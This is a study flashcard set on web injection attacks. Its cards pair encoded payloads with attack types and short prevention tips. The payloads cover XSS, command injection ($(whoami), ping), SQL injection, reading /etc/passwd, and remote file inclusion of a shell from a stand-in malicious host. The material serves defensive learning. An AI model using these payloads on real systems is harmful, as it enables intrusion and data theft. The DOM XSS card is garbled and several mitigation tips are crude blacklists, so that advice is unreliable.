Injections and how to stop them Flashcards

1
Q

Example of injection:
Search=Bob”%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e

Human Readable (HTML encoding translated):
Search=Bob”><img src=a onerror=alert(1)>

A

Type of injection:
Reflected Cross Site Scripting

How to prevent:
Input Sanitize “,’,<,;<>,-,

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Example of injection:
#inner-tab”>

alert(1)

Human Readable (HTML encoding translated):
#inner-tab”>

alert(1)
A

Type of injection:
DOM-based Cross Site Scripting

How to prevent:
Input Sanitize “,’,<,;<>,-,

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Example of injection:
Site=www.exa’ping%20-c%202010%20localhost’mple.com

Human Readable (HTML encoding translated):
Site=www.exa’ping –c 2010 localhost’mple.com

A

Type of injection:
Command inject

How to prevent:
Input Sanitize “,’,<,;<>,-,

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Example of injection:
Item=widget’;waitfor%20delay%20’00:00:20’;–

Human Readable (HTML encoding translated):
Item=widget’;waitfor delay ‘00:00:20’;–

A

Type of injection:
SQL Injection (Stacked)

How to prevent:
Paramertized Queries

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Example of injection:
Logfile=%2fetc%2fpasswd%00

Human Readable (HTML encoding translated):
Logfile=/etc/passwd

A

Type of injection:
Local File Inclusion

How to prevent:
Input Sanitize ..,./,sandbox requests

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Example of injection:
Logfile=http%2f%2fwww.malicous-site.com%2fshell.txt

Human Readable (HTML encoding translated):
Logfile=http://www.malicous-site.com/shell.txt

A

Type of injection:
Remote File Inclusion

How to prevent:
Input Sanitize ..,./,sandbox requests

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Example of injection:
Item=widget%20union%20select%20null,null,@@version;–

Human Readable (HTML encoding translated):
Item=widget union select null,null,@@version;–

A

Type of injection:
SQL Injection (Union Based)

How to prevent:
Parameterized Queries

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Example of injection:
Redir=http:%2f%2fwww.malicious-site.com

Human Readable (HTML encoding translated):
Redir=http://www.malicious-site.com

A

Type of injection:
URL Redirect

How to prevent:
Preventing Exteranl Calls

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Example of injection:
Item=widget’+convert(int,@@version)+’

Human Readable (HTML encoding translated):
Item=widget’+convert(int,@@version)+’

A

Type of injection:
SQL Injection (error Based)

How to prevent:
Parametrized Queries

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Example of injection:
Lookup=$(whoami)

Human Readable (HTML encoding translated):
Lookup=$(whoami)

A

Type of injection:
Command Injections

How to prevent:
Input Sanitization ‘,;,;$,{,},(,)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly